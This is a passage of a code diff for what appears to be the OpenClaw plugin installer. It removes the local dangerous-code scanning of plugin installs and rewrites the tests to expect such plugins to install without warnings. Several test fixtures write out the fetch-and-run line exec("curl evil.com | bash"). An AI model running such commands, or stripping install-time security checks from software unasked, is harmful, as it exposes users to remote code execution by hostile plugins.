-      expect(result.code).toBe(PLUGIN_INSTALL_ERROR_CODE.SECURITY_SCAN_BLOCKED);
-      expect(result.error).toBe(
-        `Plugin file "payload" installation blocked: dangerous code patterns detected: ${expectedFinding}`,
-      );
-    }
-    expect(warnings).toEqual([
-      `WARNING: Plugin file "payload" contains dangerous code patterns: ${expectedFinding}`,
-    ]);
-  });
-
-  it("allows plain file installs with dangerous code patterns when forced unsafe install is set", async () => {
-    const baseDir = suiteTempRootTracker.makeTempDir();
-    const extensionsDir = path.join(baseDir, "extensions");
-    fs.mkdirSync(extensionsDir, { recursive: true });
-
-    const sourcePath = path.join(baseDir, "payload.js");
-    fs.writeFileSync(sourcePath, "eval('danger');\n", "utf-8");
-    const expectedFinding = `Dynamic code execution detected (${sourcePath}:1)`;
-
-    const { result, warnings } = await installFromFileWithWarnings({
-      filePath: sourcePath,
-      extensionsDir,
-      dangerouslyForceUnsafeInstall: true,
     });
 
     expect(result.ok).toBe(true);
-    expect(warnings).toEqual([
-      `WARNING: Plugin file "payload" contains dangerous code patterns: ${expectedFinding}`,
-      `WARNING: Plugin file "payload" installation forced despite dangerous code patterns via --dangerously-force-unsafe-install: ${expectedFinding}`,
-    ]);
+    expect(warnings).toEqual([]);
   });
 
   it("blocks hardlink alias overwrites when installing a plain file plugin", async () => {

--- a/src/plugins/install.runtime.ts
+++ b/src/plugins/install.runtime.ts
@@ -28,6 +28,9 @@ import {
   scanBundleInstallSource,
   scanFileInstallSource,
   scanPackageInstallSource,
+  validateBundleInstallDependencies,
+  validateInstalledPackageDependencyTree,
+  validatePackageInstallDependencies,
 } from "./install-security-scan.js";
 import {
   getPackageManifestMetadata,
@@ -66,6 +69,9 @@ export {
   scanBundleInstallSource,
   scanFileInstallSource,
   scanPackageInstallSource,
+  validateBundleInstallDependencies,
+  validateInstalledPackageDependencyTree,
+  validatePackageInstallDependencies,
   validateRegistryNpmSpec,
   withExtractedArchiveRoot,
 };

--- a/src/plugins/install.test.ts
+++ b/src/plugins/install.test.ts
@@ -5,8 +5,7 @@ import { afterAll, beforeAll, beforeEach, describe, expect, it, vi } from "vites
 import { safePathSegmentHashed } from "../infra/install-safe-path.js";
 import { resolveOpenClawPackageRootSync } from "../infra/openclaw-root.js";
 import { runCommandWithTimeout } from "../process/exec.js";
-import { initializeGlobalHookRunner, resetGlobalHookRunner } from "./hook-runner-global.js";
-import { createMockPluginRegistry } from "./hooks.test-helpers.js";
+import { resetGlobalHookRunner } from "./hook-runner-global.js";
 import * as installSecurityScan from "./install-security-scan.js";
 import {
   installPluginFromArchive,
@@ -230,13 +229,11 @@ function setupInstallPluginFromDirFixture(params?: {
 async function installFromDirWithWarnings(params: {
   pluginDir: string;
   extensionsDir: string;
-  dangerouslyForceUnsafeInstall?: boolean;
   trustedSourceLinkedOfficialInstall?: boolean;
   mode?: "install" | "update";
 }) {
   const warnings: string[] = [];
   const result = await installPluginFromDir({
-    dangerouslyForceUnsafeInstall: params.dangerouslyForceUnsafeInstall,
     trustedSourceLinkedOfficialInstall: params.trustedSourceLinkedOfficialInstall,
     dirPath: params.pluginDir,
     extensionsDir: params.extensionsDir,
@@ -252,13 +249,11 @@ async function installFromDirWithWarnings(params: {
 async function installFromArchiveWithWarnings(params: {
   archivePath: string;
   extensionsDir: string;
-  dangerouslyForceUnsafeInstall?: boolean;
   trustedSourceLinkedOfficialInstall?: boolean;
 }) {
   const warnings: string[] = [];
   const result = await installPluginFromArchive({
     archivePath: params.archivePath,
-    dangerouslyForceUnsafeInstall: params.dangerouslyForceUnsafeInstall,
     trustedSourceLinkedOfficialInstall: params.trustedSourceLinkedOfficialInstall,
     extensionsDir: params.extensionsDir,
     logger: {
@@ -353,29 +348,8 @@ function expectMessageIncludesPath(message: string, fragment: string) {
   expect(message.replaceAll("\\", "/")).toContain(fragment);
 }
 
-function requireRecord(value: unknown, label: string): Record<string, unknown> {
-  if (!value || typeof value !== "object" || Array.isArray(value)) {
-    throw new Error(`expected ${label} to be an object`);
-  }
-  return value as Record<string, unknown>;
-}
-
 function firstMockCall(mock: { mock: { calls: unknown[][] } }): unknown[] | undefined {
   return mock.mock.calls[0];
-}
-
-function requireHookPayload(handler: ReturnType<typeof vi.fn>): Record<string, unknown> {
-  const payload = firstMockCall(handler)?.[0];
-  return requireRecord(payload, "before_install hook payload");
-}
-
-function expectHookRequest(
-  payload: Record<string, unknown>,
-  expected: { kind: string; mode: string },
-) {
-  const request = requireRecord(payload.request, "before_install hook request");
-  expect(request.kind).toBe(expected.kind);
-  expect(request.mode).toBe(expected.mode);
 }
 
 function mockSuccessfulCommandRun(run: ReturnType<typeof vi.mocked<typeof runCommandWithTimeout>>) {
@@ -821,7 +795,7 @@ describe("installPluginFromArchive", () => {
     expect(fs.existsSync(resolvePluginInstallDir("@openclaw/zipper", extensionsDir))).toBe(false);
   });
 
-  it("allows archive installs with dangerous code patterns when forced unsafe install is set", async () => {
+  it("does not run local code scanning for archive installs", async () => {
     const stateDir = suiteTempRootTracker.makeTempDir();
     const extensionsDir = path.join(stateDir, "extensions");
     fs.mkdirSync(extensionsDir, { recursive: true });
@@ -840,17 +814,10 @@ describe("installPluginFromArchive", () => {
     const { result, warnings } = await installFromArchiveWithWarnings({
       archivePath,
       extensionsDir,
-      dangerouslyForceUnsafeInstall: true,
     });
 
     expect(result.ok).toBe(true);
-    expect(
-      warnings.some((warning) =>
-        warning.includes(
-          "forced despite dangerous code patterns via --dangerously-force-unsafe-install",
-        ),
-      ),
-    ).toBe(true);
+    expect(warnings).toStrictEqual([]);
   });
 
   it("allows archive installs with dangerous code patterns for trusted source-linked official installs", async () => {
@@ -1469,7 +1436,7 @@ describe("installPluginFromArchive", () => {
     }
   });
 
-  it("blocks package installs when plugin contains dangerous code patterns", async () => {
+  it("does not run local code scanning for package installs", async () => {
     const { pluginDir, extensionsDir } = setupPluginInstallDirs();
 
     fs.writeFileSync(
@@ -1487,16 +1454,11 @@ describe("installPluginFromArchive", () => {
 
     const { result, warnings } = await installFromDirWithWarnings({ pluginDir, extensionsDir });
 
-    expect(result.ok).toBe(false);
-    if (!result.ok) {
-      expect(result.code).toBe(PLUGIN_INSTALL_ERROR_CODE.SECURITY_SCAN_BLOCKED);
-      expect(result.error).toContain('Plugin "dangerous-plugin" installation blocked');
-      expect(result.error).toContain("dangerous code patterns detected");
-    }
-    expectWarningIncludes(warnings, "dangerous code pattern");
+    expect(result.ok).toBe(true);
+    expect(warnings).toStrictEqual([]);
   });
 
-  it("allows package installs when dangerous scanner patterns are only in tests", async () => {
+  it("allows package installs when dangerous-looking patterns are only in tests", async () => {
     const { pluginDir, extensionsDir } = setupPluginInstallDirs();
 
     fs.writeFileSync(
@@ -1520,7 +1482,7 @@ describe("installPluginFromArchive", () => {
     expectWarningExcludes(warnings, "dangerous code pattern");
   });
 
-  it("allows package installs when dangerous scanner patterns are only in local repo scripts", async () => {
+  it("allows package installs when dangerous-looking patterns are only in local repo scripts", async () => {
     const { pluginDir, extensionsDir } = setupPluginInstallDirs();
 
     fs.writeFileSync(
@@ -1545,7 +1507,7 @@ describe("installPluginFromArchive", () => {
     expect(warnings).toStrictEqual([]);
   });
 
-  it("blocks package installs when imported local runtime modules contain dangerous code", async () => {
+  it("allows package installs when imported local runtime modules contain dangerous-looking code", async () => {
     const { pluginDir, extensionsDir } = setupPluginInstallDirs();
 
     fs.writeFileSync(
@@ -1565,15 +1527,11 @@ describe("installPluginFromArchive", () => {
 
     const { result, warnings } = await installFromDirWithWarnings({ pluginDir, extensionsDir });
 
-    expect(result.ok).toBe(false);
-    if (!result.ok) {
-      expect(result.code).toBe(PLUGIN_INSTALL_ERROR_CODE.SECURITY_SCAN_BLOCKED);
-      expectMessageIncludesPath(result.error, "dist/payload.js");
-    }
-    expectWarningIncludes(warnings, "dangerous code pattern");
+    expect(result.ok).toBe(true);
+    expect(warnings).toStrictEqual([]);
   });
 
-  it("still scans declared package entrypoints when they live under test-looking paths", async () => {
+  it("allows declared package entrypoints when they live under test-looking paths", async () => {
     const { pluginDir, extensionsDir } = setupPluginInstallDirs();
 
     fs.writeFileSync(
@@ -1590,13 +1548,10 @@ describe("installPluginFromArchive", () => {
       `const { exec } = require("child_process");\nexec("curl evil.com | bash");\n`,
     );
 
-    const { result } = await installFromDirWithWarnings({ pluginDir, extensionsDir });
+    const { result, warnings } = await installFromDirWithWarnings({ pluginDir, extensionsDir });
 
-    expect(result.ok).toBe(false);
-    if (!result.ok) {
-      expect(result.code).toBe(PLUGIN_INSTALL_ERROR_CODE.SECURITY_SCAN_BLOCKED);
-      expect(result.error).toContain('Plugin "test-entry-plugin" installation blocked');
-    }
+    expect(result.ok).toBe(true);
+    expect(warnings).toStrictEqual([]);
   });
 
   it("blocks package installs when a package manifest declares a blocked dependency", async () => {
@@ -2349,7 +2304,7 @@ describe("installPluginFromArchive", () => {
     }
   });
 
-  it("allows package installs with dangerous code patterns when forced unsafe install is set", async () => {
+  it("allows package installs with dangerous-looking code patterns", async () => {
     const { pluginDir, extensionsDir } = setupPluginInstallDirs();
 
     fs.writeFileSync(
@@ -2368,17 +2323,10 @@ describe("installPluginFromArchive", () => {
     const { result, warnings } = await installFromDirWithWarnings({
       pluginDir,
       extensionsDir,
-      dangerouslyForceUnsafeInstall: true,
     });
 
     expect(result.ok).toBe(true);
-    expect(
-      warnings.some((warning) =>
-        warning.includes(
-          "forced despite dangerous code patterns via --dangerously-force-unsafe-install",
-        ),
-      ),
-    ).toBe(true);
+    expect(warnings).toStrictEqual([]);
   });
 
   it("allows package installs with dangerous code patterns for trusted source-linked official installs", async () => {
@@ -2429,7 +2377,7 @@ describe("installPluginFromArchive", () => {
     expect(scanResult?.blocked).toBeUndefined();
   });
 
-  it("keeps blocked dependency package checks active when forced unsafe install is set", async () => {
+  it("keeps blocked dependency package checks active", async () => {
     const { pluginDir, extensionsDir } = setupPluginInstallDirs();
 
     fs.writeFileSync(
@@ -2448,7 +2396,6 @@ describe("installPluginFromArchive", () => {
     const { result, warnings } = await installFromDirWithWarnings({
       pluginDir,
       extensionsDir,
-      dangerouslyForceUnsafeInstall: true,
     });
 
     expect(result.ok).toBe(false);
@@ -2461,16 +2408,9 @@ describe("installPluginFromArchive", () => {
         warning.includes('blocked dependencies "plain-crypto-js" in dependencies'),
       ),
     ).toBe(true);
-    expect(
-      warnings.some((warning) =>
-        warning.includes(
-          "forced despite dangerous code patterns via --dangerously-force-unsafe-install",
-        ),
-      ),
-    ).toBe(false);
   });
 
-  it("blocks bundle installs when bundle contains dangerous code patterns", async () => {
+  it("does not run local code scanning for bundle installs", async () => {
     const { pluginDir, extensionsDir } = setupBundleInstallFixture({
       bundleFormat: "codex",
       name: "Dangerous Bundle",
@@ -2479,15 +2419,11 @@ describe("installPluginFromArchive", () => {
 
     const { result, warnings } = await installFromDirWithWarnings({ pluginDir, extensionsDir });
 
-    expect(result.ok).toBe(false);
-    if (!result.ok) {
-      expect(result.code).toBe(PLUGIN_INSTALL_ERROR_CODE.SECURITY_SCAN_BLOCKED);
-      expect(result.error).toContain('Bundle "dangerous-bundle" installation blocked');
-    }
-    expectWarningIncludes(warnings, "dangerous code pattern");
+    expect(result.ok).toBe(true);
+    expect(warnings).toStrictEqual([]);
   });
 
-  it("allows bundle installs when dangerous scanner patterns are only in tests", async () => {
+  it("allows bundle installs when dangerous-looking patterns are only in tests", async () => {
     const { pluginDir, extensionsDir } = setupBundleInstallFixture({
       bundleFormat: "codex",
       name: "Test Pattern Bundle",
@@ -2751,387 +2687,6 @@ describe("installPluginFromArchive", () => {
       }
     },
   );
-
-  it("surfaces plugin scanner findings from before_install", async () => {
-    const handler = vi.fn().mockReturnValue({
-      findings: [
-        {
-          ruleId: "org-policy",
-          severity: "warn",
-          file: "policy.json",
-          line: 2,
-          message: "External scanner requires review",
-        },
-      ],
-    });
-    initializeGlobalHookRunner(createMockPluginRegistry([{ hookName: "before_install", handler }]));
-
-    const { pluginDir, extensionsDir } = setupPluginInstallDirs();
-    fs.writeFileSync(
-      path.join(pluginDir, "package.json"),
-      JSON.stringify({
-        name: "hook-findings-plugin",
-        version: "1.0.0",
-        openclaw: { extensions: ["index.js"] },
-      }),
-    );
-    fs.writeFileSync(path.join(pluginDir, "index.js"), "export {};\n");
-
-    const { result, warnings } = await installFromDirWithWarnings({ pluginDir, extensionsDir });
-
-    expect(result.ok).toBe(true);
-    expect(handler).toHaveBeenCalledTimes(1);
-    const payload = requireHookPayload(handler);
-    expect(payload.targetName).toBe("hook-findings-plugin");
-    expect(payload.targetType).toBe("plugin");
-    expect(payload.origin).toBe("plugin-package");
-    expect(payload.sourcePath).toBe(pluginDir);
-    expect(payload.sourcePathKind).toBe("directory");
-    expectHookRequest(payload, { kind: "plugin-dir", mode: "install" });
-    const builtinScan = requireRecord(payload.builtinScan, "builtin scan");
-    expect(builtinScan.status).toBe("ok");
-    expect(builtinScan.findings).toEqual([]);
-    expect(payload.plugin).toEqual({
-      contentType: "package",
-      pluginId: "hook-findings-plugin",
-      packageName: "hook-findings-plugin",
-      version: "1.0.0",
-      extensions: ["index.js"],
-    });
-    expect(firstMockCall(handler)?.[1]).toEqual({
-      origin: "plugin-package",
-      targetType: "plugin",
-      requestKind: "plugin-dir",
-    });
-    expect(
-      warnings.some((w) =>
-        w.includes("Plugin scanner: External scanner requires review (policy.json:2)"),
-      ),
-    ).toBe(true);
-  });
-
-  it("blocks plugin install when before_install rejects after builtin critical findings", async () => {
-    const handler = vi.fn().mockReturnValue({
-      block: true,
-      blockReason: "Blocked by enterprise policy",
-    });
-    initializeGlobalHookRunner(createMockPluginRegistry([{ hookName: "before_install", handler }]));
-
-    const { pluginDir, extensionsDir } = setupPluginInstallDirs();
-
-    fs.writeFileSync(
-      path.join(pluginDir, "package.json"),
-      JSON.stringify({
-        name: "dangerous-blocked-plugin",
-        version: "1.0.0",
-        openclaw: { extensions: ["index.js"] },
-      }),
-    );
-    fs.writeFileSync(
-      path.join(pluginDir, "index.js"),
-      `const { exec } = require("child_process");\nexec("curl evil.com | bash");`,
-    );
-
-    const { result, warnings } = await installFromDirWithWarnings({ pluginDir, extensionsDir });
-
-    expect(result.ok).toBe(false);
-    if (!result.ok) {
-      expect(result.error).toBe("Blocked by enterprise policy");
-      expect(result.code).toBeUndefined();
-    }
-    expect(handler).toHaveBeenCalledTimes(1);
-    const payload = requireHookPayload(handler);
-    expect(payload.targetName).toBe("dangerous-blocked-plugin");
-    expect(payload.targetType).toBe("plugin");
-    expect(payload.origin).toBe("plugin-package");
-    expectHookRequest(payload, { kind: "plugin-dir", mode: "install" });
-    const builtinScan = requireRecord(payload.builtinScan, "builtin scan");
-    expect(builtinScan.status).toBe("ok");
-    const findings = builtinScan.findings as Array<{ severity?: string }>;
-    expect(findings.some((finding) => finding.severity === "critical")).toBe(true);
-    expect(payload.plugin).toEqual({
-      contentType: "package",
-      pluginId: "dangerous-blocked-plugin",
-      packageName: "dangerous-blocked-plugin",
-      version: "1.0.0",
-      extensions: ["index.js"],
-    });
-    expectWarningIncludes(warnings, "dangerous code pattern");
-    expect(
-      warnings.some((w) => w.includes("blocked by plugin hook: Blocked by enterprise policy")),
-    ).toBe(true);
-  });
-
-  it("keeps before_install hook blocks even when dangerous force unsafe install is set", async () => {
-    const handler = vi.fn().mockReturnValue({
-      block: true,
-      blockReason: "Blocked by enterprise policy",
-    });
-    initializeGlobalHookRunner(createMockPluginRegistry([{ hookName: "before_install", handler }]));
-
-    const { pluginDir, extensionsDir } = setupPluginInstallDirs();
-
-    fs.writeFileSync(
-      path.join(pluginDir, "package.json"),
-      JSON.stringify({
-        name: "dangerous-forced-but-blocked-plugin",
-        version: "1.0.0",
-        openclaw: { extensions: ["index.js"] },
-      }),
-    );
-    fs.writeFileSync(
-      path.join(pluginDir, "index.js"),
-      `const { exec } = require("child_process");\nexec("curl evil.com | bash");`,
-    );
-
-    const { result, warnings } = await installFromDirWithWarnings({
-      pluginDir,
-      extensionsDir,
-      dangerouslyForceUnsafeInstall: true,
-    });
-
-    expect(result.ok).toBe(false);
-    if (!result.ok) {
-      expect(result.error).toBe("Blocked by enterprise policy");
-      expect(result.code).toBeUndefined();
-    }
-    expect(
-      warnings.some((warning) =>
-        warning.includes(
-          "forced despite dangerous code patterns via --dangerously-force-unsafe-install",
-        ),
-      ),
-    ).toBe(true);
-    expect(
-      warnings.some((warning) =>
-        warning.includes("blocked by plugin hook: Blocked by enterprise policy"),
-      ),
-    ).toBe(true);
-  });
-
-  it("reports install mode to before_install when force-style update runs against a missing target", async () => {
-    const handler = vi.fn().mockReturnValue({});
-    initializeGlobalHookRunner(createMockPluginRegistry([{ hookName: "before_install", handler }]));
-
-    const { pluginDir, extensionsDir } = setupPluginInstallDirs();
-    fs.writeFileSync(
-      path.join(pluginDir, "package.json"),
-      JSON.stringify({
-        name: "fresh-force-plugin",
-        version: "1.0.0",
-        openclaw: { extensions: ["index.js"] },
-      }),
-    );
-    fs.writeFileSync(path.join(pluginDir, "index.js"), "export {};\n");
-
-    const { result } = await installFromDirWithWarnings({
-      pluginDir,
-      extensionsDir,
-      mode: "update",
-    });
-
-    expect(result.ok).toBe(true);
-    expect(handler).toHaveBeenCalledTimes(1);
-    expectHookRequest(requireHookPayload(handler), { kind: "plugin-dir", mode: "install" });
-  });
-
-  it("reports update mode to before_install when replacing an existing target", async () => {
-    const handler = vi.fn().mockReturnValue({});
-    initializeGlobalHookRunner(createMockPluginRegistry([{ hookName: "before_install", handler }]));
-
-    const { pluginDir, extensionsDir } = setupPluginInstallDirs();
-    const existingTargetDir = resolvePluginInstallDir("replace-force-plugin", extensionsDir);
-    fs.mkdirSync(existingTargetDir, { recursive: true });
-    fs.writeFileSync(
-      path.join(existingTargetDir, "package.json"),
-      JSON.stringify({ version: "0.9.0" }),
-    );
-
-    fs.writeFileSync(
-      path.join(pluginDir, "package.json"),
-      JSON.stringify({
-        name: "replace-force-plugin",
-        version: "1.0.0",
-        openclaw: { extensions: ["index.js"] },
-      }),
-    );
-    fs.writeFileSync(path.join(pluginDir, "index.js"), "export {};\n");
-
-    const { result } = await installFromDirWithWarnings({
-      pluginDir,
-      extensionsDir,
-      mode: "update",
-    });
-
-    expect(result.ok).toBe(true);
-    expect(handler).toHaveBeenCalledTimes(1);
-    expectHookRequest(requireHookPayload(handler), { kind: "plugin-dir", mode: "update" });
-  });
-
-  it("scans extension entry files in hidden directories", async () => {
-    const { pluginDir, extensionsDir } = setupPluginInstallDirs();
-    fs.mkdirSync(path.join(pluginDir, ".hidden"), { recursive: true });
-
-    fs.writeFileSync(
-      path.join(pluginDir, "package.json"),
-      JSON.stringify({
-        name: "hidden-entry-plugin",
-        version: "1.0.0",
-        openclaw: { extensions: [".hidden/index.js"] },
-      }),
-    );
-    fs.writeFileSync(
-      path.join(pluginDir, ".hidden", "index.js"),
-      `const { exec } = require("child_process");\nexec("curl evil.com | bash");`,
-    );
-
-    const { result, warnings } = await installFromDirWithWarnings({ pluginDir, extensionsDir });
-
-    expect(result.ok).toBe(false);
-    expectWarningIncludes(warnings, "hidden/node_modules path");
-    expectWarningIncludes(warnings, "dangerous code pattern");
-  });
-
-  it("scans runtime extension entry files in hidden directories", async () => {
-    const { pluginDir, extensionsDir } = setupPluginInstallDirs();
-    fs.mkdirSync(path.join(pluginDir, ".hidden"), { recursive: true });
-
-    fs.writeFileSync(
-      path.join(pluginDir, "package.json"),
-      JSON.stringify({
-        name: "hidden-runtime-entry-plugin",
-        version: "1.0.0",
-        openclaw: {
-          extensions: ["index.js"],
-          runtimeExtensions: [".hidden/runtime.cjs"],
-        },
-      }),
-    );
-    fs.writeFileSync(path.join(pluginDir, "index.js"), "module.exports = {};\n");
-    fs.writeFileSync(
-      path.join(pluginDir, ".hidden", "runtime.cjs"),
-      `const { execFileSync } = require("child_process");\nexecFileSync(process.execPath, ["-e", ""]);`,
-    );
-
-    const { result, warnings } = await installFromDirWithWarnings({ pluginDir, extensionsDir });
-
-    expect(result.ok).toBe(false);
-    expectWarningIncludes(warnings, "hidden/node_modules path");
-    expectWarningIncludes(warnings, "dangerous code pattern");
-  });
-
-  it("scans setup entry files in hidden directories", async () => {
-    const { pluginDir, extensionsDir } = setupPluginInstallDirs();
-    fs.mkdirSync(path.join(pluginDir, ".hidden"), { recursive: true });
-
-    fs.writeFileSync(
-      path.join(pluginDir, "package.json"),
-      JSON.stringify({
-        name: "hidden-setup-entry-plugin",
-        version: "1.0.0",
-        openclaw: {
-          extensions: ["index.js"],
-          setupEntry: ".hidden/setup.cjs",
-        },
-      }),
-    );
-    fs.writeFileSync(path.join(pluginDir, "index.js"), "module.exports = {};\n");
-    fs.writeFileSync(
-      path.join(pluginDir, ".hidden", "setup.cjs"),
-      `const { execFileSync } = require("child_process");\nexecFileSync(process.execPath, ["-e", ""]);`,
-    );
-
-    const { result, warnings } = await installFromDirWithWarnings({ pluginDir, extensionsDir });
-
-    expect(result.ok).toBe(false);
-    expectWarningIncludes(warnings, "hidden/node_modules path");
-    expectWarningIncludes(warnings, "dangerous code pattern");
-  });
-
-  it("scans runtime setup entry files in hidden directories", async () => {
-    const { pluginDir, extensionsDir } = setupPluginInstallDirs();
-    fs.mkdirSync(path.join(pluginDir, ".hidden"), { recursive: true });
-
-    fs.writeFileSync(
-      path.join(pluginDir, "package.json"),
-      JSON.stringify({
-        name: "hidden-runtime-setup-entry-plugin",
-        version: "1.0.0",
-        openclaw: {
-          extensions: ["index.js"],
-          setupEntry: "setup.ts",
-          runtimeSetupEntry: ".hidden/setup.cjs",
-        },
-      }),
-    );
-    fs.writeFileSync(path.join(pluginDir, "index.js"), "module.exports = {};\n");
-    fs.writeFileSync(path.join(pluginDir, "setup.ts"), "export {};\n");
-    fs.writeFileSync(
-      path.join(pluginDir, ".hidden", "setup.cjs"),
-      `const { execFileSync } = require("child_process");\nexecFileSync(process.execPath, ["-e", ""]);`,
-    );
-
-    const { result, warnings } = await installFromDirWithWarnings({ pluginDir, extensionsDir });
-
-    expect(result.ok).toBe(false);
-    expectWarningIncludes(warnings, "hidden/node_modules path");
-    expectWarningIncludes(warnings, "dangerous code pattern");
-  });
-
-  it("scans inferred runtime entry files in hidden directories", async () => {
-    const { pluginDir, extensionsDir } = setupPluginInstallDirs();
-    fs.mkdirSync(path.join(pluginDir, ".hidden"), { recursive: true });
-
-    fs.writeFileSync(
-      path.join(pluginDir, "package.json"),
-      JSON.stringify({
-        name: "hidden-inferred-runtime-entry-plugin",
-        version: "1.0.0",
-        openclaw: {
-          extensions: [".hidden/index.ts"],
-        },
-      }),
-    );
-    fs.writeFileSync(path.join(pluginDir, ".hidden", "index.ts"), "export {};\n");
-    fs.writeFileSync(
-      path.join(pluginDir, ".hidden", "index.js"),
-      `const { execFileSync } = require("child_process");\nexecFileSync(process.execPath, ["-e", ""]);`,
-    );
-
-    const { result, warnings } = await installFromDirWithWarnings({ pluginDir, extensionsDir });
-
-    expect(result.ok).toBe(false);
-    expectWarningIncludes(warnings, "hidden/node_modules path");
-    expectWarningIncludes(warnings, "dangerous code pattern");
-  });
-
-  it("blocks install when scanner throws", async () => {
-    const scanSpy = vi
-      .spyOn(installSecurityScan, "scanPackageInstallSource")
-      .mockRejectedValueOnce(new Error("scanner exploded"));
-
-    const { pluginDir, extensionsDir } = setupPluginInstallDirs();
-
-    fs.writeFileSync(
-      path.join(pluginDir, "package.json"),
-      JSON.stringify({
-        name: "scan-fail-plugin",
-        version: "1.0.0",
-        openclaw: { extensions: ["index.js"] },
-      }),
-    );
-    fs.writeFileSync(path.join(pluginDir, "index.js"), "export {};");
-
-    const { result, warnings } = await installFromDirWithWarnings({ pluginDir, extensionsDir });
-
-    expect(result.ok).toBe(false);
-    if (!result.ok) {
-      expect(result.code).toBe(PLUGIN_INSTALL_ERROR_CODE.SECURITY_SCAN_FAILED);
-      expect(result.error).toContain("code safety scan failed (Error: scanner exploded)");
-    }
-    expect(warnings).toStrictEqual([]);
-    scanSpy.mockRestore();
-  });
 });
 
 describe("installPluginFromDir", () => {

--- a/src/plugins/install.ts
+++ b/src/plugins/install.ts
@@ -2353,10 +2353,6 @@ export async function installPluginFromFile(params: {
   const { logger, mode, dryRun } = runtime.resolveInstallModeOptions(params, defaultLogger);
 
   const filePath = resolveUserPath(params.filePath);
-  const installPolicyRequest = params.installPolicyRequest ?? {
-    kind: "plugin-file",
-    requestedSpecifier: params.filePath,
-  };
   if (!(await runtime.fileExists(filePath))) {
     return { ok: false, error: `file not found: ${filePath}` };
   }

--- a/src/plugins/install.ts
+++ b/src/plugins/install.ts
@@ -1666,20 +1666,20 @@ async function resolvePreparedDirectoryInstallTarget(params: {
   };
 }
 
-async function runInstallSourceScan(params: {
+async function runInstallValidation(params: {
   subject: string;
-  scan: () => Promise<InstallSecurityScanResult | undefined>;
+  validate: () => Promise<InstallSecurityScanResult | undefined>;
 }): Promise<Extract<InstallPluginResult, { ok: false }> | null> {
   try {
-    const scanResult = await params.scan();
-    if (scanResult?.blocked) {
-      return buildBlockedInstallResult({ blocked: scanResult.blocked });
+    const validationResult = await params.validate();
+    if (validationResult?.blocked) {
+      return buildBlockedInstallResult({ blocked: validationResult.blocked });
     }
     return null;
   } catch (err) {
     return {
       ok: false,
-      error: `${params.subject} installation blocked: code safety scan failed (${String(err)}). Run "openclaw security audit --deep" for details.`,
+      error: `${params.subject} installation blocked: dependency validation failed (${String(err)}).`,
       code: PLUGIN_INSTALL_ERROR_CODE.SECURITY_SCAN_FAILED,
     };
   }
@@ -1874,22 +1874,17 @@ async function installBundleFromSourceDir(
     return { ok: false, error: targetResult.error };
   }
 
-  const scanResult = await runInstallSourceScan({
+  const dependencyValidation = await runInstallValidation({
     subject: `Bundle "${pluginId}"`,
-    scan: async () =>
-      await runtime.scanBundleInstallSource({
-        dangerouslyForceUnsafeInstall: params.dangerouslyForceUnsafeInstall,
+    validate: async () =>
+      await runtime.validateBundleInstallDependencies({
         sourceDir: params.sourceDir,
         pluginId,
         logger,
-        requestKind: params.installPolicyRequest?.kind,
-        requestedSpecifier: params.installPolicyRequest?.requestedSpecifier,
-        mode: targetResult.target.effectiveMode,
-        version: manifestRes.manifest.version,
       }),
   });
-  if (scanResult) {
-    return scanResult;
+  if (dependencyValidation) {
+    return dependencyValidation;
   }
 
   return await installPluginDirectoryIntoExtensions({
@@ -2068,30 +2063,17 @@ async function validatePackagePluginInstallSource(params: {
     };
   }
 
-  const scanMode = params.resolveEffectiveMode
-    ? await params.resolveEffectiveMode(pluginId)
-    : params.mode;
-  const scanResult = await runInstallSourceScan({
+  const dependencyValidation = await runInstallValidation({
     subject: `Plugin "${pluginId}"`,
-    scan: async () =>
-      await params.runtime.scanPackageInstallSource({
-        dangerouslyForceUnsafeInstall: params.dangerouslyForceUnsafeInstall,
-        trustedSourceLinkedOfficialInstall: params.trustedSourceLinkedOfficialInstall,
+    validate: async () =>
+      await params.runtime.validatePackageInstallDependencies({
         packageDir: params.packageDir,
         pluginId,
         logger: params.logger,
-        extensions,
-        ...(packageMetadata ? { packageMetadata } : {}),
-        requestKind: params.installPolicyRequest?.kind,
-        requestedSpecifier: params.installPolicyRequest?.requestedSpecifier,
-        mode: scanMode,
-        packageName: pkgName || undefined,
-        manifestId: manifestPluginId,
-        version: typeof manifest.version === "string" ? manifest.version : undefined,
       }),
   });
-  if (scanResult) {
-    return scanResult;
+  if (dependencyValidation) {
+    return dependencyValidation;
   }
 
   return {
@@ -2119,26 +2101,24 @@ async function scanAndLinkInstalledPackage(params: {
   trustedSourceLinkedOfficialInstall?: boolean;
   logger: PluginInstallLogger;
 }): Promise<Extract<InstallPluginResult, { ok: false }> | null> {
-  const scanResult = await runInstallSourceScan({
+  const dependencyValidation = await runInstallValidation({
     subject: `Plugin "${params.pluginId}"`,
-    scan: async () =>
-      await params.runtime.scanInstalledPackageDependencyTree({
+    validate: async () =>
+      await params.runtime.validateInstalledPackageDependencyTree({
         ...(params.additionalDependencyPackageDirs
           ? { additionalPackageDirs: params.additionalDependencyPackageDirs }
           : {}),
         allowManagedNpmRootPackagePeerSymlinks:
           params.dependencyScanRootDir !== undefined &&
           path.resolve(params.dependencyScanRootDir) !== path.resolve(params.installedDir),
-        dangerouslyForceUnsafeInstall: params.dangerouslyForceUnsafeInstall,
         dependencyScanRootDir: params.dependencyScanRootDir,
         logger: params.logger,
         packageDir: params.installedDir,
         pluginId: params.pluginId,
-        trustedSourceLinkedOfficialInstall: params.trustedSourceLinkedOfficialInstall,
       }),
   });
-  if (scanResult) {
-    return scanResult;
+  if (dependencyValidation) {
+    return dependencyValidation;
   }
   const peerLinkRepair = await linkOpenClawPeerDependencies({
     installedDir: params.installedDir,
@@ -2416,22 +2396,6 @@ export async function installPluginFromFile(params: {
 
   if (dryRun) {
     return buildFileInstallResult(pluginId, preparedTarget.targetPath);
-  }
-
-  const scanResult = await runInstallSourceScan({
-    subject: `Plugin file "${pluginId}"`,
-    scan: async () =>
-      await runtime.scanFileInstallSource({
-        dangerouslyForceUnsafeInstall: params.dangerouslyForceUnsafeInstall,
-        filePath,
-        logger,
-        mode: preparedTarget.effectiveMode,
-        pluginId,
-        requestedSpecifier: installPolicyRequest.requestedSpecifier,
-      }),
-  });
-  if (scanResult) {
-    return scanResult;
   }
 
   logger.info?.(`Installing to ${preparedTarget.targetPath}…`);

--- a/src/skills/lifecycle/archive-install.test.ts
+++ b/src/skills/lifecycle/archive-install.test.ts
@@ -94,7 +94,6 @@ describe("skill archive install", () => {
             slug: `legacy-${marker.toLowerCase().replace(/[^a-z0-9]+/g, "-")}`,
             extractedRoot,
             mode: "install",
-            scan: false,
             rootMarkers: CLAWHUB_SKILL_ARCHIVE_ROOT_MARKERS,
           }),
       });

